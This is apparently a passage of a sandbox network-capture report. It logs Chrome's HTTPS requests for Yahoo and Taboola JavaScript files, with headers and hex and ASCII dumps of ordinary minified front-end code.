                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: e.boundary,i=e.elem,a=i.getAttribute(_+"end-scrn-class"),n=a&&t&&b(i,t),o=n&&n.getElementsByClassName(a)[0];this._util.endScreenEl=o}},{key:"_addNativeVideoEvents",value:function(){var e=this._util.elem;this._state.loopCount&&(e.loop=!1,g(e,"ended",this.h
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 69 73 2e 5f 75 74 69 6c 2e 74 79 70 65 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 5f 75 74 69 6c 2e 6c 6f 6f 70 43 6f 75 6e 74 3b 65 26 26 28 74 68 69 73 2e 5f 73 74 61 74 65 2e 6c 6f 6f 70 43 6f 75 6e 74 3d 4e 75 6d 62 65 72 28 65 29 29 2c 74 68 69 73 2e 5f 63 72 65 61 74 65 44 65 66 61 75 6c 74 28 21 30 29 7d 7d 7d 2c 7b 6b 65 79 3a 22 68 61 6e 64 6c 65 56 69 64 65 6f 4d 6f 75 73 65 4c 65 61 76 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 79 76 69 64 65 6f 50 6c 61 79 6c 69 73 74 22 3d 3d 3d 74 68 69 73 2e 5f 75 74 69 6c 2e 74 79 70 65 26 26 77 28 74 68 69 73 2e 5f 73 74 61 74 65 2e 6d 6f 75 73 65 54 69 6d 65 6f 75 74 2c 74 68 69 73 29 7d 7d 2c 7b 6b 65 79 3a 22 68 61 6e 64 6c 65 4e 61 74 69 76 65 56 69 64 65 6f 45 6e 64 22 2c 76 61 6c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: is._util.type){var e=this._util.loopCount;e&&(this._state.loopCount=Number(e)),this._createDefault(!0)}}},{key:"handleVideoMouseLeave",value:function(e){"yvideoPlaylist"===this._util.type&&w(this._state.mouseTimeout,this)}},{key:"handleNativeVideoEnd",val


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              97192.168.2.45111787.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC364OUTGET /aaq/wf/wf-text-1.2.0-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC743INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: 1sF3T+REDup4WLlFw1Nowh+Y7cFt8Okvq/cHOBkMNj46wWiBMDTNwqiszj5sWeQQRYEhWWtk7Lc=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: MJAF8X725HGP8MG3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Mon, 07 Oct 2024 06:56:37 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Mon, 23 Aug 2021 06:24:25 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "956dabf4d28930bc42d934995b814d6d"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: 8acCB8Oldv6HTX7VU3iQtZux9BoZJqhX
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 3412
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 130624
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 74 65 78 74 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 74 65 78 74 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 7c 7c 7b 7d 2c 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-text",[],t):"object"==typeof exports?exports["wafer-text"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 2c 74 29 3a 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 74 29 7d 66 75 6e 63 74 69 6f 6e 20 69 28 65 2c 74 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20 63 6c 61 73 73 20 61 73 20 61 20 66 75 6e 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}function i(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a func
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC812INData Raw: 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 7b 7d 2c 66 3d 72 2e 73 65 6c 65 63 74 6f 72 3b 6f 28 74 68 69 73 2c 74 29 3b 76 61 72 20 69 3d 6e 28 74 68 69 73 2c 28 74 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 29 29 2e 63 61 6c 6c 28 74 68 69 73 2c 65 2c 7b 73 65 6c 65 63 74 6f 72 3a 66 7d 2c 7b 53 54 41 54 45 5f 41 54 54 52 53 3a 6c 7d 29 29 3b 72 65 74 75 72 6e 20 69 2e 5f 75 74 69 6c 3d 75 28 7b 7d 2c 69 2e 5f 75 74 69 6c 2c 7b 65 6c 65 6d 3a 65 7d 29 2c 69 2e 73 74 61 74 65 44 69 64 55 70 64 61 74 65 28 29 2c 69 7d 72 65 74 75 72 6e 20 66 28 74 2c 65 29 2c 73 28 74 2c 5b 7b 6b 65 79 3a 22 73 74 61 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: length>1&&void 0!==arguments[1]?arguments[1]:{},f=r.selector;o(this,t);var i=n(this,(t.__proto__||Object.getPrototypeOf(t)).call(this,e,{selector:f},{STATE_ATTRS:l}));return i._util=u({},i._util,{elem:e}),i.stateDidUpdate(),i}return f(t,e),s(t,[{key:"stat


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              98192.168.2.451121151.101.193.444431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC372OUTGET /libtrc/yahooweb-network/loader.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: cdn.taboola.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC771INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 1424512
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: VQKH2i4iN3QbzhxnpTW8ikafwAb8sxtpuap6lTvYsNLuYN/oCVboeu33Nemv5RmnRUdegn+Sq+c=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: 2Y5KA5ZDEQ98BTF5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-replication-status: FAILED
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Sun, 06 Oct 2024 10:01:24 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "70bf5db8af5c004af377c5cf24d8049b"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: 2H.iCM4JCs2VjsJlBGAoBD46B.Bs1UhV
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: AmazonS3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 19:13:40 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 26079
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Served-By: cache-ewr-kewr1740058-EWR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Cache: HIT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Cache-Hits: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Timer: S1728414820.441535,VS0,VE3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: private,max-age=14401
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              abp: 69
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC16384INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 5f 77 65 62 70 61 63 6b 5f 6d 6f 64 75 6c 65 73 5f 5f 3d 7b 36 33 33 37 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 29 69 66 28 22 49 6e 74 65 72 73 65 63 74 69 6f 6e 4f 62 73 65 72 76 65 72 22 69 6e 20 77 69 6e 64 6f 77 26 26 22 49 6e 74 65 72 73 65 63 74 69 6f 6e 4f 62 73 65 72 76 65 72 45 6e 74 72 79 22 69 6e 20 77 69 6e 64 6f 77 26 26 22 69 6e 74 65 72 73 65 63 74 69 6f 6e 52 61 74 69 6f 22 69 6e 20 77 69 6e 64 6f 77 2e 49 6e 74 65 72 73 65 63 74 69 6f 6e 4f 62 73 65 72 76 65 72 45 6e 74 72 79 2e 70 72 6f 74 6f 74 79 70 65 29 22 69 73 49 6e 74 65 72 73 65 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: (function(){var __webpack_modules__={6337:function(){!function(){"use strict";if("object"==typeof window)if("IntersectionObserver"in window&&"IntersectionObserverEntry"in window&&"intersectionRatio"in window.IntersectionObserverEntry.prototype)"isIntersec
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC16384INData Raw: 74 75 72 6e 20 43 7d 2c 6b 51 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 54 7d 7d 29 3b 76 61 72 20 69 2c 72 2c 6f 2c 61 3d 6e 28 37 35 38 32 29 2c 6c 3d 6e 28 34 39 36 36 29 2c 73 3d 6e 28 31 35 37 31 29 2c 63 3d 6e 28 39 39 39 37 29 2c 64 3d 6e 28 39 31 39 30 29 2c 75 3d 6e 28 39 39 30 31 29 2c 70 3d 6e 28 31 31 38 36 29 2c 66 3d 6e 28 35 33 38 35 29 2c 6d 3d 6e 28 38 36 38 31 29 2c 76 3d 6e 28 38 37 35 36 29 2c 68 3d 6e 75 6c 6c 2c 62 3d 22 22 3b 66 75 6e 63 74 69 6f 6e 20 67 28 29 7b 69 66 28 28 30 2c 6d 2e 51 68 29 28 29 26 26 28 30 2c 73 2e 43 64 29 28 22 6f 76 65 72 72 69 64 65 2d 61 6d 70 2d 75 72 6c 22 29 29 7b 76 61 72 20 65 3d 75 2e 74 70 2e 63 6f 6e 74 65 78 74 2c 74 3d 65 2e 63 61 6e 6f 6e 69 63 61 6c 55 72 6c 2c 6e 3d 65 2e 6c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: turn C},kQ:function(){return T}});var i,r,o,a=n(7582),l=n(4966),s=n(1571),c=n(9997),d=n(9190),u=n(9901),p=n(1186),f=n(5385),m=n(8681),v=n(8756),h=null,b="";function g(){if((0,m.Qh)()&&(0,s.Cd)("override-amp-url")){var e=u.tp.context,t=e.canonicalUrl,n=e.l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC16384INData Raw: 7b 76 61 72 20 6e 3d 62 5b 74 5d 2e 67 65 74 4e 61 6d 65 28 29 3b 2d 31 3d 3d 3d 65 2e 69 6e 64 65 78 4f 66 28 6e 29 26 26 79 28 6e 29 7d 7d 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 77 28 29 7b 76 61 72 20 65 3b 69 66 28 6e 3d 28 30 2c 66 2e 74 64 29 28 28 30 2c 72 2e 43 64 29 28 22 72 65 6e 64 65 72 2d 61 6d 70 2d 77 69 74 68 2d 62 72 69 64 67 65 22 29 2c 21 30 29 2c 69 3d 28 30 2c 72 2e 4d 76 29 28 22 69 73 2d 6d 73 33 22 29 2c 6e 3f 69 26 26 21 28 30 2c 70 2e 51 68 29 28 29 3a 69 29 7b 76 61 72 20 74 3d 28 30 2c 72 2e 43 64 29 28 22 69 6e 63 6c 75 64 65 2d 6d 73 33 22 29 3b 74 2e 6c 65 6e 67 74 68 3e 30 3f 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 3d 62 2e 6c 65 6e 67 74 68 2d 31 3b 6e 3e 3d 30 3b 6e 2d 2d 29 7b 76 61 72 20 69
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: {var n=b[t].getName();-1===e.indexOf(n)&&y(n)}}(e)}function w(){var e;if(n=(0,f.td)((0,r.Cd)("render-amp-with-bridge"),!0),i=(0,r.Mv)("is-ms3"),n?i&&!(0,p.Qh)():i){var t=(0,r.Cd)("include-ms3");t.length>0?function(e){for(var t,n=b.length-1;n>=0;n--){var i
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC16384INData Raw: 3d 69 7c 7c 69 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 61 5b 65 5d 3d 52 28 28 30 2c 72 2e 70 69 29 28 28 30 2c 72 2e 70 69 29 28 7b 7d 2c 73 29 2c 7b 66 69 65 6c 64 3a 65 7d 29 29 7d 29 29 29 2c 7b 75 72 6c 3a 6c 2c 62 6f 64 79 3a 61 7c 7c 76 6f 69 64 20 30 2c 70 75 62 6c 69 73 68 65 72 4e 61 6d 65 3a 6f 2e 70 75 62 6e 7d 7d 66 75 6e 63 74 69 6f 6e 20 42 28 65 29 7b 76 61 72 20 74 3d 55 28 22 65 78 70 6c 6f 72 65 22 2c 50 2c 65 29 2c 6e 3d 28 30 2c 61 2e 66 4d 29 28 22 65 78 70 6c 6f 72 65 22 2c 74 29 3b 72 65 74 75 72 6e 20 6e 3f 28 30 2c 78 2e 56 6a 29 28 22 65 78 70 6c 6f 72 65 22 2c 6e 29 3a 28 28 30 2c 70 2e 48 29 28 22 45 78 70 6c 6f 72 65 20 65 76 65 6e 74 20 77 61 73 20 63 61 6e 63 65 6c 65 64 22 29 2c 22 22 29 7d 66 75
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: =i||i.forEach((function(e){a[e]=R((0,r.pi)((0,r.pi)({},s),{field:e}))}))),{url:l,body:a||void 0,publisherName:o.pubn}}function B(e){var t=U("explore",P,e),n=(0,a.fM)("explore",t);return n?(0,x.Vj)("explore",n):((0,p.H)("Explore event was canceled"),"")}fu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC16384INData Raw: 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 28 69 29 29 7d 29 29 7d 29 29 7d 7d 28 22 54 72 63 43 61 6c 6c 22 29 2c 74 68 69 73 2e 5f 6c 61 73 74 45 78 65 63 75 74 69 6f 6e 3d 28 30 2c 41 2e 57 29 28 6d 2c 7b 6d 65 74 68 6f 64 3a 28 30 2c 66 2e 4d 76 29 28 22 73 65 6e 64 2d 65 76 65 6e 74 2d 61 73 2d 70 6f 73 74 22 29 3f 22 50 4f 53 54 22 3a 22 47 45 54 22 7d 29 2e 74 68 65 6e 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 62 28 29 2e 74 68 65 6e 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 28 30 2c 68 2e 6f 37 29 28 22 54 52 43 20 63 61 6c 6c 20 64 75 72 61 74 69 6f 6e 3a 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 29 29 2c 77 2e 68 61 6e 64 6c 65 4c 6f 61 64 52 65 73 70 6f 6e 73 65 28 65 2c 76 6f 69 64 20 30 2c 64 29 7d 29 29 2e 63 61 74 63 68
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: AnimationFrame(i))}))}))}}("TrcCall"),this._lastExecution=(0,A.W)(m,{method:(0,f.Mv)("send-event-as-post")?"POST":"GET"}).then((function(e){return b().then((function(e){(0,h.o7)("TRC call duration: ".concat(e))})),w.handleLoadResponse(e,void 0,d)})).catch
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC16384INData Raw: 2e 63 6c 69 65 6e 74 57 69 64 74 68 2c 65 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 69 65 6e 74 57 69 64 74 68 29 29 7d 66 75 6e 63 74 69 6f 6e 20 70 28 29 7b 76 61 72 20 65 3d 72 2e 6d 62 2e 64 6f 63 75 6d 65 6e 74 3b 72 65 74 75 72 6e 20 4d 61 74 68 2e 6d 61 78 28 4d 61 74 68 2e 6d 61 78 28 65 2e 62 6f 64 79 2e 73 63 72 6f 6c 6c 48 65 69 67 68 74 2c 65 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 73 63 72 6f 6c 6c 48 65 69 67 68 74 29 2c 4d 61 74 68 2e 6d 61 78 28 65 2e 62 6f 64 79 2e 6f 66 66 73 65 74 48 65 69 67 68 74 2c 65 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 6f 66 66 73 65 74 48 65 69 67 68 74 29 2c 4d 61 74 68 2e 6d 61 78 28 65 2e 62 6f 64 79 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 2c 65 2e 64 6f 63 75 6d 65 6e 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: .clientWidth,e.documentElement.clientWidth))}function p(){var e=r.mb.document;return Math.max(Math.max(e.body.scrollHeight,e.documentElement.scrollHeight),Math.max(e.body.offsetHeight,e.documentElement.offsetHeight),Math.max(e.body.clientHeight,e.document
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC16384INData Raw: 73 74 22 2c 7b 69 64 3a 65 2e 5f 49 44 7d 29 7d 7d 28 65 2c 6e 29 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 4c 3b 69 66 28 65 2e 63 72 6f 70 70 69 6e 67 26 26 74 29 7b 76 61 72 20 69 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 21 28 30 2c 64 2e 4d 76 29 28 22 69 6d 61 67 65 2d 63 72 6f 70 70 69 6e 67 2d 61 63 74 69 76 65 22 29 29 72 65 74 75 72 6e 22 22 3b 76 61 72 20 6e 3d 52 28 7b 69 74 65 6d 44 61 74 61 3a 65 2c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3a 65 2e 63 72 6f 70 70 69 6e 67 2c 63 6c 6f 73 65 73 74 52 61 74 69 6f 3a 74 2c 72 65 70 6f 72 74 69 6e 67 50 72 65 66 69 78 3a 22 74 63 69 22 7d 29 3b 72 65 74 75 72 6e 20 6e 3f 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 72 61 74 69 6f 2c 6e 3d 74 2e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: st",{id:e._ID})}}(e,n),l=function(e,t){var n=L;if(e.cropping&&t){var i=function(e,t){if(!(0,d.Mv)("image-cropping-active"))return"";var n=R({itemData:e,configuration:e.cropping,closestRatio:t,reportingPrefix:"tci"});return n?function(e){var t=e.ratio,n=t.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC16384INData Raw: 69 73 68 65 72 49 64 3a 65 2e 70 75 62 6c 69 73 68 65 72 49 64 2c 74 69 74 6c 65 3a 74 2e 74 69 74 6c 65 7c 7c 75 2c 63 73 73 3a 6e 2e 63 73 73 7c 7c 70 2c 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 74 2e 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 7c 7c 66 2c 68 65 61 64 65 72 53 65 6c 65 63 74 6f 72 3a 74 2e 68 65 61 64 65 72 53 65 6c 65 63 74 6f 72 7c 7c 6d 2c 66 65 65 64 43 6f 6e 74 61 69 6e 65 72 57 69 64 74 68 3a 74 2e 66 65 65 64 43 6f 6e 74 61 69 6e 65 72 57 69 64 74 68 7c 7c 76 2c 69 73 43 6f 70 79 4f 75 74 65 72 48 54 4d 4c 48 65 61 64 65 72 3a 28 30 2c 73 2e 63 76 29 28 22 64 65 73 6b 74 6f 70 22 29 7c 7c 28 30 2c 72 2e 4d 76 29 28 22 65 78 70 6c 6f 72 65 2d 6d 6f 72 65 2d 63 6f 70 79 2d 68 74 6d 6c 2d 6f 75 74 65 72 2d 68 65 61 64 65 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: isherId:e.publisherId,title:t.title||u,css:n.css||p,backgroundColor:t.backgroundColor||f,headerSelector:t.headerSelector||m,feedContainerWidth:t.feedContainerWidth||v,isCopyOuterHTMLHeader:(0,s.cv)("desktop")||(0,r.Mv)("explore-more-copy-html-outer-header
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC16384INData Raw: 2e 65 4c 29 28 65 2e 70 72 6f 74 65 63 74 65 64 41 75 64 69 65 6e 63 65 2c 74 29 7d 2c 75 70 64 61 74 65 52 6f 6f 74 52 65 73 70 6f 6e 73 65 43 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 7d 3b 66 75 6e 63 74 69 6f 6e 20 67 28 29 7b 76 61 72 20 65 3d 28 30 2c 6d 2e 43 64 29 28 22 70 61 2d 64 65 62 75 67 2d 6c 65 76 65 6c 22 29 2c 74 3d 28 30 2c 76 2e 42 56 29 28 73 2e 4c 35 2e 63 6f 6e 66 69 67 2e 72 75 6e 74 69 6d 65 2e 64 65 62 75 67 51 75 65 72 79 50 61 72 61 6d 73 2e 70 61 5f 64 65 62 75 67 29 3b 72 65 74 75 72 6e 20 72 7c 7c 28 72 3d 65 7c 7c 74 7c 7c 30 29 2c 72 7d 66 75 6e 63 74 69 6f 6e 20 79 28 29 7b 76 61 72 20 65 2c 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 73 2e 4c 35 2e 72 65 73 70 6f 6e 73 65 53 75 6d 6d 61 72 79 2e 77
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: .eL)(e.protectedAudience,t)},updateRootResponseCache:function(){}};function g(){var e=(0,m.Cd)("pa-debug-level"),t=(0,v.BV)(s.L5.config.runtime.debugQueryParams.pa_debug);return r||(r=e||t||0),r}function y(){var e,t=function(){var e=s.L5.responseSummary.w
